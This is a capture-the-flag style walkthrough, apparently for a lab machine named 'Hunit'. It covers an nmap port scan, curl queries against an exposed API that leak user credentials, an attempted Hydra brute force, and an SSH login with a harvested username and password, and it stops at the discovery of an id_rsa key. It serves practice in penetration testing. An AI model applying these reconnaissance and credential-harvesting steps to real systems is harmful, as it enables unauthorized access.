Skip to content

Files

Latest commit

The-Viper-Onegitbook-bot
The-Viper-One
and
gitbook-bot
GitBook: [#2670] Restructure
Jun 4, 2022
c0f2844 · Jun 4, 2022

History

History
85 lines (59 loc) · 1.93 KB

hunit.md

File metadata and controls

85 lines (59 loc) · 1.93 KB

Hunit (WIP)

Nmap

sudo nmap   192.168.79.125 -p- -sS -sV

Not shown: 65531 filtered ports
PORT      STATE SERVICE    VERSION
8080/tcp  open  http-proxy
12445/tcp open  unknown
18030/tcp open  http       Apache httpd 2.4.46 ((Unix))
43022/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)

Browsing to port 8080 takes us to a web page for haikus.

We can individually browse to each haiku.

Checking the source page for any haiku reveals a comment refer to API.

Running curl against the API reveals further information

curl http://192.168.79.125:8080/api/

Runnining curl against the user API directory reveals sensitive information regarding each user.

curl http://192.168.79.125:8080/api/user/

Compiling the passwords and login names of each provides us with a users and password list.

{% tabs %} {% tab title="Users" %}

rjackson
dademola
jvargas
jsanchez

{% endtab %} {% endtabs %}

{% tabs %} {% tab title="Passwords" %}

yYJcgYqszv4aGQ
ExplainSlowQuest110
KTuGcSW6Zxwd0Q
d52cQ1BzyNQycg
OuQ96hcgiM5o9w

{% endtab %} {% endtabs %}

I then tried bruteforcing this with Hydra and was unable to get a result.

Inspecting our found information further we find that all the users are 'Editors' and David is a admin. The password associated with David is also greatly different from the rest. I then tried a manual login with SSH.

ssh -p 43022 [email protected]

Valid credentials: dademola:ExplainSlowQuest110

Looking for other users in /home/ we see we have the Git user. Checking contents of the directory we also have a id_rsa key.